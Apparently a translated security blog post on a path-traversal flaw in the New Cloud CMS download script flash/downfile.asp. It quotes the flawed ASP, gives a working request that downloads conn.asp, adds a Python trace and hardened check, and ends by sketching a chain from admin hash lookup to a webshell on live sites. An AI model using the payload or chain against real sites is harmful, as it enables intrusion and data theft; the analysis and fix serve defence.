The problem is in flash/downfile.asp. Let's look at the code first.
<%
Dim url, strUrl, strPath
url = Replace(Replace(Replace(Request("url"), "'", ""), "%", ""), "\", "/")
' first strip some characters: ' and % are replaced with nothing, \ becomes /
If Len(url) > 3 Then
    If Left(url, 1) = "/" Then
        Response.Redirect url   ' if the first character of the user-supplied url is /, redirect to it instead of downloading
    End If
    If Left(url, 3) = "../" Then
        Response.Redirect url   ' same as above: you are not allowed to use ../ to climb out of the directory
    End If
    strUrl = Left(url, 10)
    If InStr(strUrl, "://") > 0 Then   ' hmm... only the first ten characters are searched for ://, no idea why
        Response.Redirect url
    End If
    If InStr(url, "/") > 0 Then
        strPath = Server.MapPath(".") & "\" & url   ' prepend the physical path of the script's directory
        strPath = Replace(strPath, "/", "\")         ' turn / back into \
        Call downThisFile(strPath)                   ' and here the download starts
    Else
        Response.Redirect url
    End If
End If

Sub downThisFile(thePath)
    Response.Clear
    On Error Resume Next
    Dim stream, fileName, fileContentType
    fileName = Split(thePath, "\")(UBound(Split(thePath, "\")))   ' last path component becomes the download name
    Set stream = Server.CreateObject("ADODB.Stream")
    stream.Open
    stream.Type = 1   ' adTypeBinary
    stream.LoadFromFile thePath
    Response.AddHeader "Content-Disposition", "attachment; filename=" & fileName
    Response.AddHeader "Content-Length", stream.Size
    Response.Charset = "UTF-8"
    Response.ContentType = "application/octet-stream"
    Response.BinaryWrite stream.Read
    Response.Flush
    stream.Close
    Set stream = Nothing
End Sub
%>
So the url is filtered and apparently cannot use ../ to climb out of the directory. But it is odd that the script only looks at the first three characters of the url. The first three characters cannot be ../, but what about the ones after them? Construct the url parameter uploadfile/../../conn.asp; the full request is http://127.0.0.1/flash/downfile.asp?url=uploadfile/../../conn.asp. Every check passes: the url does not start with / or ../, its first ten characters contain no ://, and it contains a /. strPath therefore becomes Server.MapPath(".") & "\uploadfile\..\..\conn.asp", which the file system resolves two levels above the flash directory, and conn.asp, the database connection file, is served as a download.
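To make the bypass concrete, here is an added example in Python (not code from the original post or from the New Cloud program) that re-implements the checks of downfile.asp string for string, shows what physical path the uploadfile/../../conn.asp payload produces and where it actually resolves, and puts a canonicalisation-based check next to it. The site root C:\inetpub\wwwroot, the flash\uploadfile download directory and the function names are assumptions made for this example.

```python
# Added example, not code from the original post or from the New Cloud program.
# Re-implements the downfile.asp checks in Python so the bypass can be traced, and
# shows a canonicalisation-based check next to it. Site root, directory layout and
# function names are assumptions made for this example.
import ntpath

WEB_ROOT = r"C:\inetpub\wwwroot"                      # assumed site root
SCRIPT_DIR = ntpath.join(WEB_ROOT, "flash")           # Server.MapPath(".") inside flash/downfile.asp
DOWNLOAD_DIR = ntpath.join(SCRIPT_DIR, "uploadfile")  # assumed directory the script is meant to serve from


def downfile_original(url):
    """Mirror of the original filter, step for step.

    Returns ('redirect', url), ('download', physical_path) or ('none', None)
    for inputs the script ignores because Len(url) <= 3.
    """
    url = url.replace("'", "").replace("%", "").replace("\\", "/")
    if len(url) <= 3:
        return ("none", None)
    if url.startswith("/"):
        return ("redirect", url)
    if url.startswith("../"):              # Left(url, 3): only the first three characters are inspected
        return ("redirect", url)
    if "://" in url[:10]:                  # InStr(Left(url, 10), "://")
        return ("redirect", url)
    if "/" in url:
        physical = (SCRIPT_DIR + "\\" + url).replace("/", "\\")
        return ("download", physical)
    return ("redirect", url)


def resolves_to(physical_path):
    """The file the file system actually opens once the .. components are applied."""
    return ntpath.normpath(physical_path)


def downfile_hardened(name, base=DOWNLOAD_DIR):
    """Serve only files below base: join, canonicalise, then check containment.

    The client no longer chooses the directory; name is relative to base.
    Returns the physical path to serve, or None to refuse the request.
    """
    if not name or "\x00" in name:
        return None
    candidate = ntpath.normpath(ntpath.join(base, name.replace("/", "\\")))
    try:
        common = ntpath.commonpath([base, candidate])
    except ValueError:                     # different drive letter or a UNC path: cannot be below base
        return None
    if ntpath.normcase(common) != ntpath.normcase(base):
        return None                        # escaped the base directory via .. or an absolute path
    if ntpath.normcase(candidate) == ntpath.normcase(base):
        return None                        # the directory itself, not a file inside it
    return candidate


if __name__ == "__main__":
    payload = "uploadfile/../../conn.asp"  # the url parameter from the post
    verdict, physical = downfile_original(payload)
    print(verdict, physical)               # download C:\inetpub\wwwroot\flash\uploadfile\..\..\conn.asp
    print(resolves_to(physical))           # C:\inetpub\wwwroot\conn.asp, two levels above flash\
    print(downfile_hardened("../../conn.asp"))   # None
    print(downfile_hardened("intro.swf"))        # C:\inetpub\wwwroot\flash\uploadfile\intro.swf
```

The hardened variant does not try to blacklist ../ at all: it joins the name onto a fixed base, normalises the result and refuses anything whose canonical form is not below that base, which also rejects absolute paths and UNC paths. Note that the original concatenates the user string after Server.MapPath(".") instead of passing it to Server.MapPath, so IIS's own parent-path restriction (ASP error 0175, "Disallowed Parent Path") never sees the .. components; that is an observation about the code shown above, not something the post states.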
A lot of sites still run this whole CMS; I even saw two hacker websites using it. The vulnerability is present in all of them: it can be used against essentially every New Cloud installation on the Internet, and not even the 10.18 SP1 patch fixes it. Many of the bigger sites run the SQL Server edition, however, and the host blocks port 1433, so making use of the server becomes a problem. For the Access edition, as long as the admin backend has not been renamed, the MD5 password hash can be looked up on www.20.5.com, and since the backend has a database backup function, getting a webshell is not a problem.